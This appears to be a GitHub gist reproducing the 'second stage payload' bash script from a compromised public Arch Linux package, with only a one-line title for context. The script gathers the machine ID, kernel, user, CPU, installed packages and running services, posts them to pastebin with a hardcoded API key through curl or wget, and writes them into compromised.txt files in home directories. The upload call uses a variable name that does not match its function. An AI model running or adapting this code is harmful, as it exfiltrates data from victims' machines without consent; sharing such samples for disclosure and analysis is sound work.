~u file downloaded as 2nd stage payload in public Arch package compromise
| #!/bin/bash | |
| function urle() { | |
| sed -e 's|!|%21|' -e 's|#|%23|' -e 's|$|%24|' -e 's|&|%26|' -e "s|'|%27|" -e 's|(|%28|' -e 's|)|%29|' -e 's|*|%2a|' -e 's|+|%2b|' -e 's|,|%2c|' -e 's|/|%2f|' -e 's|:|%3a|' -e 's|;|%3b|' -e 's|=|%3d|' -e 's|?|%3f|' -e 's|@|%40|' -e 's|\[|%5b|' -e 's|]|%5d|' | |
| } | |
| declare -fx urle | |
| GID= | |
| MACHINE_ID="$(cat /etc/machine-id)" | |
| PASTE_TITLE="$(echo [xeactor]\ $MACHINE_ID|urle)" | |
| upload() { | |
| up_data="$(echo $1|urle)" | |
| if [[ "$HTTP_CLIENT" == "curl" ]]; then | |
| prefix='curl -s --data' | |
| elif [[ "$HTTP_CLIENT" == "wget" ]]; then | |
| prefix='wget -O/dev/null -q --post-data' | |
| fi | |
| $prefix "api_dev_key=42ba93112cc9677382e55e5e387eafa1&api_paste_private=0&api_paste_name=${PASTE_TITLE}&api_option=paste&api_paste_code=$up_data" "https://pastebin.com/api/api_post.php" >/dev/null 2>&1 | |
| } | |
| if which wget >/dev/null 2>&1; then | |
| export HTTP_CLIENT=wget | |
| elif which curl >/dev/null 2>&1; then | |
| export HTTP_CLIENT=curl | |
| else | |
| exit 0 | |
| fi | |
| cmd_log() { echo "[cmd] \`$@\`:"; "$@" 2>&1; echo; } | |
| full_log() { | |
| echo ${MACHINE_ID} | |
| cmd_log date '+%s' | |
| cmd_log uname -a | |
| cmd_log id | |
| cmd_log lscpu | |
| cmd_log pacman -Qeq | |
| cmd_log pacman -Qdq | |
| cmd_log systemctl list-units | |
| } | |
| FULL_LOG="$(full_log)" | |
| $uploader "$FULL_LOG" | |
| for x in /root /home/*; do | |
| if [[ -w "$x/compromised.txt" ]]; then | |
| echo "$FULL_LOG" > "$x/compromised.txt" | |
| fi | |
| done | |
| exit 0 | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment